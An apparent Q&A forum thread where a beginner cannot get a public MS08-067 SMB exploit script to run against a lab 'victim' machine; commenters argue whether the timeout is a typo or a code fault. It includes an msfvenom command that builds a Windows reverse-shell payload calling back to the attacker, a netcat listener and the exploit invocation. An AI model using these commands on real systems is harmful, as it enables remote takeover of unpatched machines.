
I am somewhat new to this and trying to figure out why my program isn't executing as expected. I ran it a number of times, with one time completing successfully but not allowing me to connect to the victim's machine.

I am running the following exploit on my victim's machine (https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py).

I used the following msfvenom command to create my shellcode:

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
```

I then dropped that shellcode into the script to replace the older one.

If you read below in the script you can see the following. Basically you can alter which Windows target is used, from 1 to 7 (the script is Python 2, hence the `print` statement):

```python
def __DCEPacket(self):
    if (self.os == '1'):
        print 'Windows XP SP0/SP1 Universal\n'
        ret = "\x61\x13\x00\x01"
```

I ran from 1 to 7 for the most part, and every time I got the same issue:

```
Windows XP SP0/SP1 Universal
 [-]Initiating connection
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "ms08-067.py", line 217, in run
    self.__DCEPacket()
  File "ms08-067.py", line 192, in __DCEPacket
    self.__trans.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 386, in connect
    self.setup_smb_connection()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 381, in setup_smb_connection
    preferredDialect=self.__prefDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 74, in __init__
    self.negotiateSession(preferredDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 111, in negotiateSession
    self._timeout, True, flags1=flags1, flags2=flags2, data=negoData)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 159, in negotiateSessionWildcard
    timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 878, in __init__
    timeout=timeout, local_type=local_type, sock=sock)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 738, in __init__
    self._sock = self._setup_connection((remote_host, sess_port), timeout)
  File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 889, in _setup_connection
    raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
error: [Errno Connection error (10.10.10.4:445)] timed out
```

I have my script running as follows:

```
nc -lnvp 443
```

and

```
python ms08-067.py <IP address> <version number> <445>
```
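As an added illustration (not part of the original question or of the linked script), the helper below isolates what the last line of the traceback reports. impacket's `nmb._setup_connection` raises `socket.error("Connection error (host:port)", e)` around the plain TCP connect, before any SMB traffic is exchanged, so `timed out` there means the TCP handshake to the target's port 445 never completed within the timeout. The function names, the local throwaway listener and the parsed sample line are constructed for this example; run against a real host:port it distinguishes a timeout (no answer at all) from a refusal (host reachable, port closed), which is the first thing to check when an SMB client times out.

```python
import re
import socket


def classify_tcp_connect(host, port, timeout=3.0):
    """Attempt a TCP connect to (host, port) with a bounded timeout and
    report the outcome as a short string instead of raising.

    This is the same step impacket's nmb._setup_connection performs before
    wrapping the failure in socket.error("Connection error (host:port)", e).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except socket.timeout:
        # No SYN/ACK within the timeout: host down, filtered, or wrong address.
        return "timed out"
    except ConnectionRefusedError:
        # Host answered with RST: reachable, but nothing listens on that port.
        return "refused"
    except OSError as exc:
        # Anything else, e.g. "Network is unreachable" for a bad route.
        return "error: %s" % exc
    finally:
        sock.close()


def parse_connection_error(line):
    """Extract (host, port, reason) from impacket's error line, e.g.
    'error: [Errno Connection error (10.10.10.4:445)] timed out'.
    Returns None if the line does not have that shape."""
    m = re.search(r"Connection error \(([^:()]+):(\d+)\)\]\s*(.*)$", line)
    if not m:
        return None
    return m.group(1), int(m.group(2)), m.group(3).strip()


def demo_against_local_listener():
    """Constructed demonstration: open a throwaway listener on 127.0.0.1,
    connect to it (expect 'open'), close it, connect again (expect 'refused')."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    while_open = classify_tcp_connect("127.0.0.1", port, timeout=2.0)
    srv.close()
    after_close = classify_tcp_connect("127.0.0.1", port, timeout=2.0)
    return while_open, after_close


if __name__ == "__main__":
    # The error line from the question, parsed back into its parts.
    sample = "error: [Errno Connection error (10.10.10.4:445)] timed out"
    print(parse_connection_error(sample))
    # Local demonstration of 'open' versus 'refused'.
    print(demo_against_local_listener())
```

Usage against a real target would be `classify_tcp_connect(host, 445)`; a result of `"timed out"` is produced long before any exploit code runs, and is the same condition the traceback above reports.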
  • This isn't a security problem. This is a typo problem. Read the last line of the error carefully. – schroeder Nov 15 '19 at 19:39
  • Connection error (10.10.10.4:445), but you are listening on nc -lnvp 443 – schroeder Nov 15 '19 at 19:40
  • @schroeder you are wrong, 445 is the correct port for SMB – Dauren Akilbekov May 20 '20 at 09:52
  • @DaurenAkilbekov I am not wrong. I'm quoting the OP's error and the command the OP used. – schroeder May 20 '20 at 09:56
  • This error is not because of the OP's mistake, but a problem with the code he is using. Here is the explanation: https://forum.hackthebox.eu/discussion/592/manual-ms08-067-issue. – Dauren Akilbekov May 20 '20 at 10:07
  • @DaurenAkilbekov you are going to have to summarise the link. That's a long thread without much context. – schroeder May 20 '20 at 10:20
  • You are saying he made a typo, but he didn't. He is trying to open a reverse shell and listening on port 443 to catch it, while using a vulnerability in SMB on port 445. The error here is happening because of the Python code. – Dauren Akilbekov May 20 '20 at 10:25
  • @DaurenAkilbekov if nc was run on the attacking machine, that makes sense. But if so, the nc command is irrelevant to the question or the troubleshooting scenario. If we remove that whole section, along with the msfvenom line (which would also be irrelevant), then the question comes down to debugging some random exploit script, which is also off-topic here. – schroeder May 20 '20 at 10:26
  • @DaurenAkilbekov and if all that was true, I'm now very concerned that the OP copy/pasted IP info from the example into the OP's live environment without regard for the IPs in the OP's environment. Which would make this a typo issue again. – schroeder May 20 '20 at 10:32
